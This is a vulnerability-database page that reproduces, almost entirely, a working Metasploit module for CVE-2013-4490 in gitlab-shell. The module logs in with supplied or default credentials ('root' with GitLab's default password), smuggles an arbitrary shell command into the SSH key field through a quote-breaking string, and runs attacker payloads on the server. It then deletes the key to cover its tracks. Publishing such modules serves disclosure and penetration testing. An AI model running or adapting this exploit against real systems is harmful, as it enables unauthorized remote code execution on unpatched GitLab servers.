Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormBrandon KnightPACKETSTORM:127916
HistoryAug 18, 2014 - 12:00 a.m.

Gitlab-shell Code Execution

2014-08-1800:00:00
Brandon Knight
packetstormsecurity.com
55

0.222 Low

EPSS

Percentile

96.5%

JSON
`##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
require 'net/ssh'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Gitlab-shell Code Execution',  
'Description' => %q(  
This module takes advantage of the addition of authorized  
ssh keys in the gitlab-shell functionality of Gitlab. Versions  
of gitlab-shell prior to 1.7.4 used the ssh key provided directly  
in a system call resulting in a command injection vulnerability. As  
this relies on adding an ssh key to an account valid credentials  
are required to exploit this vulnerability.  
),  
'Author' =>  
[  
'Brandon Knight'  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['URL', 'https://about.gitlab.com/2013/11/04/gitlab-ce-6-2-and-5-4-security-release/'],  
['CVE', '2013-4490']  
],  
'Platform' => 'linux',  
'Targets' =>  
[  
[ 'Linux',  
{  
'Platform' => 'linux',  
'Arch' => ARCH_X86  
}  
],  
[ 'Linux (x64)',  
{  
'Platform' => 'linux',  
'Arch' => ARCH_X86_64  
}  
],  
[ 'Unix (CMD)',  
{  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Payload' =>  
{  
'Compat' =>  
{  
'RequiredCmd' => 'openssl perl python'  
},  
'BadChars' => "\x22"  
}  
}  
],  
[ 'Python',  
{  
'Platform' => 'python',  
'Arch' => ARCH_PYTHON,  
'Payload' =>  
{  
'BadChars' => "\x22"  
}  
}  
]  
],  
'CmdStagerFlavor' => %w( bourne printf ),  
'DisclosureDate' => 'Nov 4 2013',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('USERNAME', [true, 'The username to authenticate as', 'root']),  
OptString.new('PASSWORD', [true, 'The password for the specified username', '5iveL!fe']),  
OptString.new('TARGETURI', [true, 'The path to Gitlab', '/'])  
], self.class)  
end  
  
def exploit  
login  
case target['Platform']  
when 'unix'  
execute_command(payload.encoded)  
when 'python'  
execute_command("python -c \\\"#{payload.encoded}\\\"")  
when 'linux'  
execute_cmdstager(temp: './', linemax: 2800)  
end  
end  
  
def execute_command(cmd, _opts = {})  
key_id = add_key(cmd)  
delete_key(key_id)  
end  
  
def check  
res = send_request_cgi('uri' => normalize_uri(target_uri.path.to_s, 'users', 'sign_in'))  
if res && res.body && res.body.include?('GitLab')  
return Exploit::CheckCode::Detected  
else  
return Exploit::CheckCode::Unknown  
end  
end  
  
def login  
username = datastore['USERNAME']  
password = datastore['PASSWORD']  
signin_page = normalize_uri(target_uri.path.to_s, 'users', 'sign_in')  
  
# Get a valid session cookie and authenticity_token for the next step  
res = send_request_cgi(  
'method' => 'GET',  
'cookie' => 'request_method=GET',  
'uri' => signin_page  
)  
  
fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during login") unless res  
  
local_session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]  
auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]  
  
if res.body.include? 'user[email]'  
@gitlab_version = 5  
user_field = 'user[email]'  
else  
@gitlab_version = 7  
user_field = 'user[login]'  
end  
  
# Perform the actual login and get the newly assigned session cookie  
res = send_request_cgi(  
'method' => 'POST',  
'cookie' => local_session_cookie,  
'uri' => signin_page,  
'vars_post' =>  
{  
'utf8' => "\xE2\x9C\x93",  
'authenticity_token' => auth_token,  
"#{user_field}" => username,  
'user[password]' => password,  
'user[remember_me]' => 0  
}  
)  
  
fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res && res.code == 302  
  
@session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]  
  
fail_with(Failure::NoAccess, "#{peer} - Unable to get session cookie") if @session_cookie.nil?  
end  
  
def add_key(cmd)  
if @gitlab_version == 5  
@key_base = normalize_uri(target_uri.path.to_s, 'keys')  
else  
@key_base = normalize_uri(target_uri.path.to_s, 'profile', 'keys')  
end  
  
# Perform an initial request to get an authenticity_token so the actual  
# key addition can be done successfully.  
res = send_request_cgi(  
'method' => 'GET',  
'cookie' => "request_method=GET; #{@session_cookie}",  
'uri' => normalize_uri(@key_base, 'new')  
)  
  
fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res  
  
auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]  
title = rand_text_alphanumeric(16)  
key_info = rand_text_alphanumeric(6)  
  
# Generate a random ssh key  
key = OpenSSL::PKey::RSA.new 2048  
type = key.ssh_type  
data = [key.to_blob].pack('m0')  
  
openssh_format = "#{type} #{data}"  
  
# Place the payload in to the key information to perform the command injection  
key = "#{openssh_format} #{key_info}';#{cmd}; echo '"  
  
res = send_request_cgi(  
'method' => 'POST',  
'cookie' => "request_method=GET; #{@session_cookie}",  
'uri' => @key_base,  
'vars_post' =>  
{  
'utf8' => "\xE2\x9C\x93",  
'authenticity_token' => auth_token,  
'key[title]' => title,  
'key[key]' => key  
}  
)  
  
fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res  
  
# Get the newly added key id so it can be used for cleanup  
key_id = res.headers['Location'].split('/')[-1]  
  
key_id  
end  
  
def delete_key(key_id)  
res = send_request_cgi(  
'method' => 'GET',  
'cookie' => "request_method=GET; #{@session_cookie}",  
'uri' => @key_base  
)  
  
fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res  
  
auth_token = res.body.scan(/<meta content="(.*?)" name="csrf-token"/).flatten[0]  
  
# Remove the key which was added to clean up after ourselves  
res = send_request_cgi(  
'method' => 'POST',  
'cookie' => "#{@session_cookie}",  
'uri' => normalize_uri("#{@key_base}", "#{key_id}"),  
'vars_post' =>  
{  
'_method' => 'delete',  
'authenticity_token' => auth_token  
}  
)  
  
fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res  
end  
end  
`

Related

zdt 1
cvelist 1
cve 1
debiancve 1
prion 1
nvd 1
openvas 1
zdt
zdt
Gitlab-shell Code Execution Exploit
2014-08-18 00:00:00
cvelist
cvelist
CVE-2013-4490
2014-05-13 15:00:00
cve
cve
CVE-2013-4490
2014-05-13 15:55:03
debiancve
debiancve
CVE-2013-4490
2014-05-13 15:55:03
prion
prion
Design/Logic Flaw
2014-05-13 15:55:00
nvd
nvd
CVE-2013-4490
2014-05-13 15:55:03
openvas
openvas
GitLab Community Edition 4.2.x - 5.4.0, 6.x - 6.2.2 Multiple Vulnerabilities
2022-03-28 00:00:00

0.222 Low

EPSS

Percentile

96.5%

JSON
Related for PACKETSTORM:127916
zdt1cvelist1cve1debiancve1prion1nvd1openvas1